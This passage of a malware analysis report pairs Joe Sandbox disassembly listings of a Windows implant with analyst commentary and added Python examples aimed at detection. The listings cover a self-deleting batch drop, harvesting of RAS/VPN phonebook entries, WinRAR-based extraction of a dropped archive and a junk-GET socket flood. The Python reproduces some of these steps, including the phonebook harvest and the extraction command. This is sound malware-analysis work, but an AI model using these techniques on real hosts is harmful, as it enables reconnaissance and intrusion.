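        for later in events[i + 1:]:
            if (later.get("EventID") == "1"
                    and later.get("ParentImage", "") == dropper
                    and target.lower() in later.get("CommandLine", "").lower()):
                hits.append((target, dropper))
                break
    return hits


def classify_batch(text: str) -> Dict[str, bool]:
    """Flags for a recovered batch file: self-deletion and wildcard temp cleanup."""
    return {"self_deleting": bool(SELF_DELETE.search(text)),
            "wildcard_temp_delete": bool(WILDCARD_TEMP_DEL.search(text))}


if __name__ == "__main__":
    print(find_temp_ccc_drops(SAMPLE_EVENTS))
    print(find_batch_drop_then_exec(SAMPLE_EVENTS))
    print(classify_batch(SAMPLE_BATCH))
```

The batch check matters because C:\Del.bat is gone by the time a responder looks; the file-create event and the cmd.exe child are the durable evidence, and Sysmon FileCreate does not capture content, so recovering the batch text needs a file-content source (EDR, or the Sleep(0x493E0) five-minute delay before the write, which leaves a window to copy it).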
                        APIs
                        • GetWindowsDirectoryA.KERNEL32 ref: 100070EE
                        • strchr.MSVCRT ref: 10007100
                        • lstrcpy.KERNEL32(00000001), ref: 1000710B
                        • lstrcat.KERNEL32(?,?), ref: 10007120
                        • lstrcat.KERNEL32(?,\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk), ref: 1000712C
                        • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000023,00000000), ref: 1000713C
                        • wsprintfA.USER32 ref: 1000715C
                        • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 1000717A
                        • GetPrivateProfileSectionNamesA.KERNEL32(00000000,00001000,00000400), ref: 100071A5
                        • lstrlen.KERNEL32(00000000), ref: 100071BD
                        • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 100071DB
                        Strings
                        • \Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10007126
                        • Microsoft\Network\Connections\pbk\rasphone.pbk, xrefs: 10007149
                        • Documents and Settings\, xrefs: 100070F4
                        • %s//%s, xrefs: 10007156
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$??2@??3@DirectoryFolderNamesPathPrivateProfileSectionSpecialWindowslstrcpylstrlenstrchrwsprintf
                        • String ID: %s//%s$Documents and Settings\$Microsoft\Network\Connections\pbk\rasphone.pbk$\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk
                        • API String ID: 1834765725-145037316
                        • Opcode ID: ea2ca12f91690c0177fe22b59ab2b64000e33ec7f30e3f32dcd36f701b4e543f
                        • Instruction ID: 1d5da528494376ec11e15f2ceb721689f3966667e2731b8acf70afdf37f9cb04
                        • Opcode Fuzzy Hash: ea2ca12f91690c0177fe22b59ab2b64000e33ec7f30e3f32dcd36f701b4e543f
                        • Instruction Fuzzy Hash: B03190B1504395ABE310CF64DC88F9BB7E9FB89345F04091CF68997240E674EA09CBA2
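This function locates rasphone.pbk, the phonebook in which Windows stores RAS dial-up and VPN entries, via two candidate paths: <drive>\Documents and Settings\...\Application Data\Microsoft\Network\Connections\pbk\rasphone.pbk (the component appended by the lstrcat at 10007120 is not resolved in the listing), and the CSIDL 0x23 (CSIDL_COMMON_APPDATA) folder joined with "%s//%s". It then calls GetPrivateProfileSectionNamesA into a 0x1000-byte heap buffer and walks the result with lstrlen, i.e. it enumerates the name of every configured connection. Added example, not code from the report or the sample: it reproduces both steps on a constructed .pbk so the harvested data is visible, including the API's truncation behaviour when the 0x1000-byte buffer is too small (the entry names and keys below are invented).

```python
from typing import List

# Constructed rasphone.pbk fragment: two RAS entries with illustrative keys.
SAMPLE_PBK = """[Corp VPN]
Encoding=1
PBVersion=1
Type=2
AutoLogon=0
PhoneNumber=vpn.example.test

[Dialup ISP]
Encoding=1
Type=1
PhoneNumber=5551234
"""


def section_names_buffer(ini_text: str, buf_size: int = 0x1000) -> bytes:
    """Mimic GetPrivateProfileSectionNamesA: section names separated by NUL and
    terminated by a second NUL.  When the buffer is too small the API copies
    buf_size - 2 characters and still appends the double NUL, so the last name
    returned can be cut short."""
    names = []
    for line in ini_text.splitlines():
        s = line.strip()
        if s.startswith("[") and s.endswith("]"):
            names.append(s[1:-1])
    buf = b"".join(n.encode("ascii") + b"\x00" for n in names) + b"\x00"
    if len(buf) > buf_size:
        buf = buf[:buf_size - 2] + b"\x00\x00"
    return buf


def walk_double_nul(buf: bytes) -> List[str]:
    """Walk the list the way the function does: lstrlen on the current pointer,
    advance by length + 1, stop at the empty string."""
    names, pos = [], 0
    while pos < len(buf):
        end = buf.index(b"\x00", pos)          # lstrlen
        if end == pos:                          # zero-length string: terminator
            break
        names.append(buf[pos:end].decode("ascii"))
        pos = end + 1
    return names


def harvest_ras_entries(pbk_text: str, buf_size: int = 0x1000) -> List[str]:
    """What the sample obtains: every connection name the victim has configured."""
    return walk_double_nul(section_names_buffer(pbk_text, buf_size))


if __name__ == "__main__":
    print(harvest_ras_entries(SAMPLE_PBK))
```

Connection names alone are reconnaissance (they reveal which corporate VPNs or ISPs a host uses); a read of rasphone.pbk by anything other than rasphone.exe, rasdial.exe or the Network Connections UI is a useful file-access audit trigger.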
                        APIs
                        • ??2@YAPAXI@Z.MSVCRT(0000001C,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 100079D0
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A13
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A27
                        • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A6D
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007A81
                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007AC7
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007ADB
                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B21
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B35
                        • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B7B
                        • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000000,00000000,?,100078E0,?,?,00000000,?,?,00000000,?,?), ref: 10007B8F
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 10007BE8
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007BFC
                        • ??3@YAXPAX@Z.MSVCRT(00000000,?,?), ref: 10007C41
                        • ??2@YAPAXI@Z.MSVCRT(?,?,?), ref: 10007C55
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: ??2@$??3@
                        • String ID:
                        • API String ID: 1245774677-0
                        • Opcode ID: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                        • Instruction ID: f5f466769b3d5a285a58fc263d702a5cbf1c20c9a80e860f9cf8c2d8843b1e01
                        • Opcode Fuzzy Hash: efc4adb11d259ce337aa2f88174ac1102378eaacc0aa5d6b11d5639599dfff2b
                        • Instruction Fuzzy Hash: FBC1BFB5B002054BA718CE39C88296B77D6FFC82A0B19862CF91A8B3C5DF75ED05C791
                        APIs
                          • Part of subcall function 1000DA90: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,74DF23A0,?,?), ref: 1000DAFC
                        • lstrlen.KERNEL32(?), ref: 100094F5
                        • lstrcat.KERNEL32(?,rar.exe), ref: 10009531
                        • lstrcpy.KERNEL32(?,?), ref: 10009542
                        • PathRemoveFileSpecA.SHLWAPI(?), ref: 1000954C
                        • lstrcpy.KERNEL32(?,?), ref: 10009558
                        • PathRemoveExtensionA.SHLWAPI(?), ref: 1000955F
                        • lstrcat.KERNEL32(?,1007A0CC), ref: 1000956F
                        • wsprintfA.USER32 ref: 10009584
                        • ShellExecuteA.SHELL32(00000000,open,?,?,00000000,00000000), ref: 100095A8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: PathRemovelstrcatlstrcpy$ExecuteExtensionFileOpenShellSpeclstrlenwsprintf
                        • String ID: WinRAR\shell\open\command$open$rar.exe$x %s %s
                        • API String ID: 1763624715-2921234164
                        • Opcode ID: 7f2e975523fe2e8bcc399525799bcc9cdfde6edcdcfa1cdec018838bf37f6480
                        • Instruction ID: 6f2a5d6d61e29fd9b32933393f3aebf121524222d07c899c0ac238576ae04a66
                        • Opcode Fuzzy Hash: 7f2e975523fe2e8bcc399525799bcc9cdfde6edcdcfa1cdec018838bf37f6480
                        • Instruction Fuzzy Hash: E931B5B6104395AFE730DB64CC94FEB77AEEBC8304F00891DF68597141DA746A09CB62
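Here the implant reads the WinRAR\shell\open\command value (the subcall opens the key with 0x20019 = KEY_READ), replaces the file name of the WinRAR GUI path with rar.exe via PathRemoveFileSpecA, strips the extension from an archive path with PathRemoveExtensionA to obtain an output directory, formats "x %s %s" and runs it through ShellExecuteA(NULL, "open", ...): extraction of a dropped archive with the victim's own WinRAR command-line tool. Added example, not code from the report or the sample: it reproduces the path derivation so the exact process-creation signature can be written. The registry value and archive path are constructed, and the string appended by the lstrcat at 1000956F is not resolved in the listing, so it is omitted.

```python
import ntpath
from typing import Tuple

# Constructed value of HKCR\WinRAR\shell\open\command on a typical install.
SAMPLE_COMMAND_VALUE = r'"C:\Program Files\WinRAR\WinRAR.exe" "%1"'


def first_executable(command_value: str) -> str:
    """Program path from a shell\\open\\command value: the quoted first token,
    or everything up to the first space when unquoted."""
    s = command_value.strip()
    if s.startswith('"'):
        return s[1:s.index('"', 1)]
    return s.split(" ", 1)[0]


def path_remove_file_spec(path: str) -> str:
    """PathRemoveFileSpecA: strip the trailing file name, keep the directory."""
    return ntpath.split(path)[0]


def path_remove_extension(path: str) -> str:
    """PathRemoveExtensionA: strip the extension from the last component."""
    return ntpath.splitext(path)[0]


def derive_rar_exe(command_value: str) -> str:
    """WinRAR's install directory from the registry, with rar.exe as the file name."""
    return ntpath.join(path_remove_file_spec(first_executable(command_value)), "rar.exe")


def build_extract_launch(command_value: str, archive: str) -> Tuple[str, str]:
    """(file, parameters) as handed to ShellExecuteA(NULL, "open", file, parameters, ...).
    The output directory is the archive path minus its extension."""
    return derive_rar_exe(command_value), "x %s %s" % (archive, path_remove_extension(archive))


if __name__ == "__main__":
    # Archive path is a placeholder; the listing does not name the file being extracted.
    print(build_extract_launch(SAMPLE_COMMAND_VALUE, r"C:\WINDOWS\TEMP\payload.rar"))
```

The resulting signature is rar.exe started with a first argument of x by a parent that is neither WinRAR.exe nor an interactive shell; because ShellExecuteA is used rather than CreateProcess, the parent recorded by process auditing is still the implant.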
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: strchrstrncpy$atoi
                        • String ID:
                        • API String ID: 3940265933-0
                        • Opcode ID: 816fdbf65cd72fabb2aa30a79c57e8cb6fd0b7eed96f753a9e6d43fb37b6bd28
                        • Instruction ID: 0fdf4c8053bc9ff82b36e248c3a16f8bfc8b4a51b13a3ddeb2220d11fe4376a8
                        • Opcode Fuzzy Hash: 816fdbf65cd72fabb2aa30a79c57e8cb6fd0b7eed96f753a9e6d43fb37b6bd28
                        • Instruction Fuzzy Hash: 6A91FB329001595BD728CB75CC45AEFB7A5FF88360F504369F91AA32C0DEB49F45CA94
                        APIs
                        • GetModuleHandleA.KERNEL32(00000000), ref: 10002947
                        • LoadIconA.USER32 ref: 1000297E
                        • LoadCursorA.USER32(00000000,00007F00), ref: 1000298F
                        • RegisterClassExA.USER32(?), ref: 100029AE
                        • CreateWindowExA.USER32(00000000,1007A204,1007A204,00CF0000,000000DF,000000DF,000000DF,000000DF,00000000,00000000,00000000,00000000), ref: 100029D4
                        • ShowWindow.USER32(00000000,00000005), ref: 100029E3
                        • UpdateWindow.USER32(00000000), ref: 100029EA
                        • GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 10002A01
                        • TranslateMessage.USER32(00007F05), ref: 10002A19
                        • DispatchMessageA.USER32(00007F05), ref: 10002A20
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 10002A2D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Window$Load$ClassCreateCursorDispatchHandleIconModuleRegisterShowTranslateUpdate
                        • String ID: 0
                        • API String ID: 2442869364-4108050209
                        • Opcode ID: a5df4cdca1b6303bb7a157d627bf0f17ec5658882591744a2746c0665ef1b709
                        • Instruction ID: 452a29b99672fa169a167d43a9007894026dbe05f92063e57662e3b8614e90c2
                        • Opcode Fuzzy Hash: a5df4cdca1b6303bb7a157d627bf0f17ec5658882591744a2746c0665ef1b709
                        • Instruction Fuzzy Hash: F921B7716083607FF310DB648C49F4B7BA4EB85B60F104619F744AB3C0EBB59A01CB96
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: wsprintf$Version
                        • String ID: Windows 2000$Windows 2003$Windows NT$Windows Windows7/Vista/2008$Windows XP
                        • API String ID: 514958720-574678973
                        • Opcode ID: bf58b4ad99adad6409f910661b6ee8fe034f4f40f1ecb92a7fdf0be722cf5670
                        • Instruction ID: 24c1d421adad4ae168f3c91883552d5e216c80a16ef910f6aa1ad10f15ce1383
                        • Opcode Fuzzy Hash: bf58b4ad99adad6409f910661b6ee8fe034f4f40f1ecb92a7fdf0be722cf5670
                        • Instruction Fuzzy Hash: 05118F30801796A7E610DB18DC85F8E77D1EB42295F40C515F7C9D2223D73C89858AAB
                        APIs
                        • ReleaseDC.USER32(?,?), ref: 10010048
                        • DeleteDC.GDI32(?), ref: 10010058
                        • DeleteDC.GDI32(?), ref: 1001005E
                        • DeleteDC.GDI32(?), ref: 10010064
                        • DeleteDC.GDI32(?), ref: 1001006D
                        • DeleteObject.GDI32(?), ref: 10010079
                        • DeleteObject.GDI32(?), ref: 1001007F
                        • DeleteObject.GDI32(?), ref: 10010088
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 10010092
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 1001009E
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 100100A7
                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,1006A2DE,000000FF,1000FFF8), ref: 100100B0
                        • DestroyCursor.USER32(00000000), ref: 100100D6
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: Delete$??3@$Object$CursorDestroyRelease
                        • String ID:
                        • API String ID: 2735177900-0
                        • Opcode ID: 88d8ee02bde693fecdd167aef27db3de6e3e6adf181a70a9ef565598dacbdba7
                        • Instruction ID: 40855e795b9994a06c17d96a434293416e0ab878ab8001573340353b808a687e
                        • Opcode Fuzzy Hash: 88d8ee02bde693fecdd167aef27db3de6e3e6adf181a70a9ef565598dacbdba7
                        • Instruction Fuzzy Hash: 8E21E7B6600B509BD224DBA9CC80A57F3E9FF88710F154D1DE69A87650DAB9F8408BA1
                        APIs
                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 10009944
                          • Part of subcall function 100098B0: ??2@YAPAXI@Z.MSVCRT(00000400,?,74DF0F10,74DF2EE0,10002CFA,?,SSSSSS), ref: 100098B8
                          • Part of subcall function 100098B0: FindResourceA.KERNEL32(?,0000006C,HOST), ref: 100098D9
                          • Part of subcall function 100098B0: LoadResource.KERNEL32(?,00000000), ref: 100098E1
                          • Part of subcall function 100098B0: LockResource.KERNEL32(00000000), ref: 100098E8
                          • Part of subcall function 100098B0: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10009914
                        • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 100099FB
                        • GetFileSize.KERNEL32(00000000,00000000), ref: 10009A0E
                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009A22
                        • lstrlen.KERNEL32(?), ref: 10009A30
                        • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 10009A39
                        • lstrlen.KERNEL32(?,?,00000000), ref: 10009A5F
                        • WriteFile.KERNEL32(00000000,00000000,00000000), ref: 10009A68
                        • CloseHandle.KERNEL32(00000000), ref: 10009A6F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$Resource$??2@lstrlen$??3@CloseCreateDirectoryFindHandleLoadLockPointerSizeSystemWrite
                        • String ID: .key$XXXXXX
                        • API String ID: 3558955628-2601115946
                        • Opcode ID: 414a28476207a3a5b972280860fe32485c0c9a40dd829a028d92af4c1fb2d687
                        • Instruction ID: 60457d991d027f43edb6e8b1e85ed4da5897b9db5320601ca10af0e33541605b
                        • Opcode Fuzzy Hash: 414a28476207a3a5b972280860fe32485c0c9a40dd829a028d92af4c1fb2d687
                        • Instruction Fuzzy Hash: 6D316B722006441BE728DA749C9AF6B368BEBC5371F14072DFB678B2D1DEE49D098361
                        APIs
                        • WSAStartup.WS2_32(00000202,?), ref: 10004354
                        • htons.WS2_32 ref: 1000437B
                        • inet_addr.WS2_32(1007DDAC), ref: 1000438B
                        • socket.WS2_32(00000002,00000001,00000000), ref: 100043AA
                        • connect.WS2_32(00000000,?,00000010), ref: 100043BA
                        • send.WS2_32(00000000,GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#,?,00000000), ref: 100043DF
                        • Sleep.KERNEL32(00000032,?,00000000), ref: 100043E8
                        • closesocket.WS2_32(00000000), ref: 100043F5
                        • RtlExitUserThread.NTDLL(00000000), ref: 10004406
                        • closesocket.WS2_32 ref: 1000440D
                        Strings
                        • GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#, xrefs: 100043C7, 100043D9
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.000000001007A000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F3000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083178807.00000000100F8000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083240295.00000000100FA000.00000040.00001000.00020000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_10000000_ILQ18dgzMU.jbxd
                        Yara matches
                        Similarity
                        • API ID: closesocket$ExitSleepStartupThreadUserconnecthtonsinet_addrsendsocket
                        • String ID: GET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET ^&*().htmlGET %$#@!.aspGET !@#$%.htmGET !@#$%.htmGET %$#@!.aspGET ^&*().htmlGET !@#$%.htmGET %$#
                        • API String ID: 4272391932-4039768343
                        • Opcode ID: 6be616c98efd641372f917d20bf551fd97e4ee60cf2278735f5bd3c030c7430b
                        • Instruction ID: f9848304cd2ba2fa41d176b923ecb0142be28a43c1fb6bf90fbd86cbaff65e0a
                        • Opcode Fuzzy Hash: 6be616c98efd641372f917d20bf551fd97e4ee60cf2278735f5bd3c030c7430b
                        • Instruction Fuzzy Hash: EC2107711013A06FF300DF308C89BAA37A9EF89754F10062DF5A2962D1EBB48D45876A
                        APIs
                        • GetVersionExA.KERNEL32(?), ref: 004015B9
                        • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 004015F0
                        • wsprintfA.USER32 ref: 00401620
                        • GetFileAttributesA.KERNEL32(?), ref: 0040163A
                        • ExitProcess.KERNEL32 ref: 00401647
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4082612578.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.4082597077.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082631431.0000000000406000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082647752.0000000000407000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082671358.000000000042E000.00000008.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082688873.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.4082705565.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_ILQ18dgzMU.jbxd
                        Similarity
                        • API ID: AttributesDirectoryExitFileProcessVersionWindowswsprintf
                        • String ID: %s\SysTEM32\sysedit.exe$H$o$s$t
                        • API String ID: 2470598139-87740868
                        • Opcode ID: d2e811863a9b49c5d408ef776e4ffa2498d0a50ecc84f11167e5ab6d080ebfc2
                        • Instruction ID: 9c754c24d7df86e72f217f6b84ded3ef6561d36448fc88f2c9c81648c7896505
                        • Opcode Fuzzy Hash: d2e811863a9b49c5d408ef776e4ffa2498d0a50ecc84f11167e5ab6d080ebfc2
                        • Instruction Fuzzy Hash: 9F216332E04258AFDF61C7A4DC0DBCE7BB96B06304F1044E5E285B51D1DBB85B98CB1A
                        APIs
                        • InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 10012D16
                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,80000000,00000000), ref: 10012D44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4083122327.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.4083106981.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                        • Associated: 00000000.00000002.4083160359.000000001006E000.00000002.00001000.00020000.00000000.sdmp
